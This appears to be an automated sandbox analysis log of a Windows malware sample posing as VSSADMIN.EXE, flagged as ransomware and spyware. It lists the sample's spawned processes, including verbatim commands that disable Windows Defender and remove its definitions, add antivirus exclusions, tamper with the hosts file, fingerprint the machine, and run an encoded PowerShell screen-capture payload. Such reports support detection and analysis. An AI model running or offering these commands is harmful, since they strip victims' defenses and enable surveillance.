              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exeCode function: 59_2_00007FF6EE77B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,59_2_00007FF6EE77B57C
              Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exeCode function: String function: 00007FF6EE748444 appears 48 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exeCode function: String function: 00007FF6EE7749F4 appears 53 times
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: String function: 00007FFD3FBF2A09 appears 144 times
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: String function: 00007FFD3FBF2739 appears 418 times
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: String function: 00007FFD3FBF3012 appears 50 times
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: String function: 00007FFD3FBF405C appears 631 times
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: String function: 00007FFD3FBF698D appears 44 times
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: String function: 00007FFD3FBF4840 appears 111 times
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: String function: 00007FFD3FBF24B9 appears 65 times
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: String function: 00007FFD3FBF1EF1 appears 1222 times
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: String function: 00007FF614C72770 appears 82 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exeCode function: 59_2_00007FF6EE753A70: CreateFileW,CreateFileW,DeviceIoControl,CloseHandle,59_2_00007FF6EE753A70
              Source: rar.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: VSSADMIN.EXE.exeBinary or memory string: OriginalFilename vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187886205.0000024133482000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000000.00000000.187671270.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVSSADMIN.EXEj% vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000000.00000003.188359144.0000024133482000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187947489.0000024133482000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187925323.0000024133482000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187766996.0000024133482000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000000.00000003.188385630.0000024133482000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187840544.0000024133482000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187859504.0000024133482000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187787611.0000024133482000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187735351.0000024133482000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000000.00000003.188146324.0000024133482000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187811955.0000024133482000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187904602.0000024133482000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000000.00000003.188454384.0000024133482000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exeBinary or memory string: OriginalFilename vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000001.00000002.245920910.00007FFD43EFB000.00000004.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000001.00000002.246274689.00007FFD526AC000.00000004.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000001.00000002.246379014.00007FFD5560C000.00000004.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000001.00000002.245820603.00007FFD4054B000.00000004.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamepython311.dll. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000001.00000002.246110254.00007FFD44164000.00000004.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000001.00000002.246518063.00007FFD592DC000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000001.00000002.246157050.00007FFD44A02000.00000004.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000001.00000002.245994756.00007FFD43FB3000.00000004.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilenamelibsslH vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000001.00000002.246601065.00007FFD59307000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000001.00000000.188990624.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVSSADMIN.EXEj% vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000001.00000002.246206992.00007FFD507F8000.00000004.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000001.00000002.246478224.00007FFD59283000.00000004.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000001.00000002.246337519.00007FFD52E08000.00000004.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000001.00000002.246042976.00007FFD43FED000.00000004.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000001.00000002.246427952.00007FFD59262000.00000004.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exeBinary or memory string: OriginalFilenameVSSADMIN.EXEj% vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exeStatic PE information: invalid certificate
              Source: libcrypto-1_1.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9985088531464251
              Source: libssl-1_1.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9920135147270115
              Source: python311.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9993315999451067
              Source: sqlite3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9977988591269841
              Source: unicodedata.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9943153231216458
              Source: VSSADMIN.EXE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: classification engineClassification label: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@126/90@8/3
              Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exeFile read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C774E0 GetLastError,FormatMessageW,WideCharToMultiByte,0_2_00007FF614C774E0
              Source: VSSADMIN.EXE.exeReversingLabs: Detection: 23%
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile read: C:\Users\user\Desktop\VSSADMIN.EXE.exeJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\VSSADMIN.EXE.exe C:\Users\user\Desktop\VSSADMIN.EXE.exe
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Users\user\Desktop\VSSADMIN.EXE.exe C:\Users\user\Desktop\VSSADMIN.EXE.exe
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VSSADMIN.EXE.exe'"
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VSSADMIN.EXE.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ???.scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ???.scr'
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.cmdline
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
